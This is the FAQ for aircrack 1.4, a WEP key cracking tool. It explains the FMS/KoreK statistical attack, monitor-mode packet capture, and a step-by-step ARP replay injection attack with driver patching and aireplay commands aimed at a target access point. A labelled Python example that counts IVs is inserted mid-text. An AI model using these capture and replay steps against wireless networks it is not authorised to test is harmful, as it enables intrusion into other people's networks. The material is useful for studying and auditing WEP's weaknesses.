

    --[ What is aircrack ?
      
aircrack is an 802.11 WEP key cracker.  It implements the so-called
Fluhrer-Mantin-Shamir (FMS) attack, along with some new attacks by
a talented hacker named KoreK.  When enough encrypted packets have
been gathered, aircrack can almost instantly recover the WEP key.


    --[ How does aircrack work ?

Every WEP-encrypted packet carries a 3-byte initialization vector
(IV) in the clear. Some IVs leak information about a particular byte
of the key, so the correct key emerges statistically once a
sufficient number of IVs have been collected.


    --[ How many packets are needed for recovering a WEP key ?

It really depends on your luck and the way the IVs are distributed.
Most  of the time, 1M unique IVs (thus ~2M packets) are enough. If
you're very lucky only 500K IVs may be required; and if you're out
of luck you could need around 1.5M-2M unique IVs.
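The IV bookkeeping described above, as an added example that is not part of aircrack: a small Python snippet that extracts the IV from constructed WEP data frames, counts unique IVs the way airodump's counter does, and computes the birthday-bound chance that a 24-bit IV has already repeated. The frame layout (24-byte MAC header, Protected bit in Frame Control, IV followed by the key-id byte) is the standard 802.11 one; the sample frames are constructed here.

```python
import math

FC_TYPE_DATA = 0x2    # type field of Frame Control byte 0 (bits 2-3)
FC_PROTECTED = 0x40   # "Protected"/WEP flag in Frame Control byte 1
IV_SPACE = 2 ** 24    # a 3-byte IV has only 16,777,216 possible values

def wep_iv(frame: bytes):
    """Return the 3-byte IV of a WEP-protected data frame, else None.
    Assumes a plain 24-byte header (no QoS/Address-4), as aircrack 1.4 did."""
    if len(frame) < 24 + 4:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 0x3 != FC_TYPE_DATA:    # not a data frame
        return None
    if not fc1 & FC_PROTECTED:              # WEP bit clear: plaintext frame
        return None
    return frame[24:27]                     # IV sits right after the header

def count_unique_ivs(frames):
    """Total WEP data frames and number of distinct IVs, as airodump shows."""
    ivs, total = set(), 0
    for f in frames:
        iv = wep_iv(f)
        if iv is not None:
            total += 1
            ivs.add(iv)
    return total, len(ivs)

def p_iv_repeat(n_packets: int) -> float:
    """Birthday bound: probability that n random 24-bit IVs contain a repeat.
    Around 5000 packets already give a 50% chance of keystream reuse."""
    return 1.0 - math.exp(-n_packets * (n_packets - 1) / (2 * IV_SPACE))

def make_frame(iv: bytes, protected: bool = True) -> bytes:
    """Constructed minimal data frame: header + IV + key id + body + ICV."""
    fc1 = FC_PROTECTED if protected else 0x00
    header = bytes([0x08, fc1]) + bytes(22)   # 0x08 = data frame, subtype 0
    return header + iv + b"\x00" + b"\xaa" * 8 + b"\x00" * 4

# Constructed capture: two frames share an IV, one frame is unencrypted.
SAMPLE = [make_frame(b"\x01\x02\x03"), make_frame(b"\x01\x02\x03"),
          make_frame(b"\x0a\x0b\x0c"), make_frame(b"\xff\xff\xff", False)]

if __name__ == "__main__":
    print("frames / unique IVs:", count_unique_ivs(SAMPLE))
    print("P(IV repeat after 5000 packets) = %.3f" % p_iv_repeat(5000))
```

The 1M unique IVs quoted above cover only about 6% of the IV space, which is why a busy WEP network is bound to reuse keystream; this small IV space is one reason WEP was superseded by WPA/WPA2.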


    --[ Is aircrack different from AirSnort ?

It is much more efficient. AirSnort requires more than two million
unique IVs to crack a 104-bit WEP key, whereas aircrack needs only
half as many. Additionally, post-2002 Wi-Fi equipment filters out
the "interesting" IVs AirSnort relies on; aircrack, on the other
hand, can break a WEP key without the need for those IVs.


    --[ How do I capture packets ?

First of all, you have to put the wireless interface in monitor
mode; for example, if you have a Prism2 card and use linux-wlan-ng:

# wlanctl-ng wlan0 lnxreq_ifstate ifstate=enable
# wlanctl-ng wlan0 lnxreq_wlansniff enable=true channel=<AP channel>
# ifconfig wlan0 up
# airodump wlan0 fcap

Alternatively, if you use the more stable & friendly hostap driver:

# iwconfig wlan0 mode Monitor
# iwconfig wlan0 channel <AP channel>
# iwconfig wlan0 sensitivity 3
# iwpriv wlan0 monitor_type 1
# ifconfig wlan0 up
# airodump wlan0 wlancap

I'd recommend you use airodump instead of tcpdump, because it can
handle large (> 2 GB) capture files and displays more meaningful
information about each AP (ESSID, total # of unique IVs, ...). Note
that you can run both airodump and Kismet at the same time, but in
this case you should lock channel hopping ('L' in Kismet).
For wardriving purposes, I've included a shell script (chopper.sh)
you can use to hop between 11b/11g channels.


    --[ How can I run aircrack in the background ?

For this purpose, you may use the "screen" program.

    . Starting a new session: screen -t title
    . Detaching a session: Ctrl-a <release> d
    . Reattaching a session:  screen -r


    --[ How do I know when aircrack finds the key ?

Your screen will look like:

    ------------------------------------------------------------------

                                 aircrack 1.4

   * Got 1207486  unique IVs | fudge factor = 2
   * Elapsed time [00:00:07] | tried 1 keys at 8 k/m

   KB    depth   votes
    0    0/  1   C7( 202) 1D(  18) 16(  16) 24(  15) 29(  15) 6F(  15)
    1    0/  1   3F( 307) 44(  33) 1E(  21) 41(  15) 42(  15) 45(  15)
    2    0/  1   57( 245) 0E(  27) 15(  15) DA(  15) FA(  15) 55(  12)
    3    0/  1   A7( 139) 59(  36) 9D(  24) F6(  18) A4(  16) 10(  15)
    4    0/  1   71( 181) AB(  72) F7(  25) FB(  22) 2A(  16) 0A(  15)
    5    0/  1   F9( 129) 32(  60) 14(  28) 73(  28) CF(  27) 71(  20)
    6    0/  2   8F( 154) 71( 120) 30(  56) 72(  27) F0(  23) 80(  17)
    7    0/  1   41( 206) CC(  28) 34(  15) CA(  15) CB(  15) CE(  15)
    8    0/  1   EA( 207) 2D(  66) 7E(  30) 82(  24) 92(  15) CA(  15)
    9    0/  1   0C( 290) 37(  56) 99(  54) 15(  33) 9B(  27) F0(  22)
   10    0/  1   BF( 360) 76(  40) 93(  37) 1E(  33) 20(  26) 8C(  25)
   11    0/  2   D3(  98) 51(  67) 0F(  47) 53(  45) C0(  35) 55(  34)
   12    0/  1   64(1394) 9A( 225) 6F( 199) 19( 195) BB( 185) 94( 148)

                 KEY FOUND! [C7:3F:57:A7:71:F9:8F:41:EA:0C:BF:D3:64]

    ------------------------------------------------------------------

    --[ I've got x million packets but aircrack doesn't find the key !

WEP cracking is _not_ an exact science.  Sometimes luck is on your
side, and sometimes not. By gathering as many encrypted packets as
possible, you'll greatly increase your chances of finding the key.
Also, try adding "-s 1" or raising the fudge factor. As a last
resort, send me an email (see http://www.cr0.net:8040/about/).


    --[ There's not enough wireless traffic, what can I do ?

One possibility is to launch a replay attack based on ARP-request
packets. Although we cannot say for sure that a packet is one of
those (since the data is encrypted), such packets have a fixed
length and can be spotted easily. By resending these packets again
and again, the other host will respond with encrypted replies, thus
providing new and possibly weak IVs.

First of all, you have to sniff long enough to get some potential
ARP-request packets. Then you'll need two wireless cards: card #0
will resend the packets over the air, and card #1 will monitor the
encrypted replies.

If you are far from the Access Point, I suggest you use two strong
directional antennas and wireless cards with a high output power;
otherwise you'll mostly see the very packets that you're resending.

The tricky part is that it's quite a pain in the ass to send raw
data frames with Prism2 cards. You can't do it in monitor mode
because the braindead chipset will trash the 802.11 header. So to
achieve our goal we are going to use HostAP's wlan0ap interface in
Master mode on the same channel as the legitimate AP we're trying
to crack (thanks to the guy who wrote airpwn for this tip).

    * Step 1: patch and recompile HostAP

# wget http://hostap.epitest.fi/releases/hostap-driver-0.2.4.tar.gz
# tar -xvzf hostap-driver-0.2.4.tar.gz
# cd hostap-driver-0.2.4
# patch -Np1 -i ../aircrack-1.4/rawsend.patch
# make && make install
# /etc/init.d/pcmcia restart

    * Step 2: Start the attack

# iwpriv wlan0 hostapd 1
# iwpriv wlan0ap host_encrypt 1
# iwpriv wlan0ap host_decrypt 1
# iwconfig wlan0ap retry 1
# iwconfig wlan0ap mode Master
# iwconfig wlan0ap key 01:02:04:08:10
# iwconfig wlan0ap channel <AP channel>
# ifconfig wlan0 hw ether <some random MAC>
# ifconfig wlan0ap up
# aireplay wlan0ap replay.pcap

On a side note, the "magic" WEP key above simply tells HostAP not
to re-encrypt outgoing data packets.

Meanwhile, card #1 (wlan1 here) monitors the encrypted replies:

# iwconfig wlan1 mode Monitor
# iwconfig wlan1 channel <AP channel>
# iwpriv wlan1 monitor_type 0
# ifconfig wlan1 up
# airodump wlan1 replies


    --[ Special thanks to:

        * Jouni Malinen for developing the hostap driver
        * Dag Wieers for producing RPM packages of aircrack
        * KoreK for sharing the code of his WEP attacks
        * Erik Winkler for his help in testing and debugging
        * aminal for helping me solve the check_wepkey bug
        * Konstantin Gavrilenko for sending me a copy of Wi-Foo
        * b0nk for his work on optimizing the aireplay attack
        * and many other people... (you know who you are).


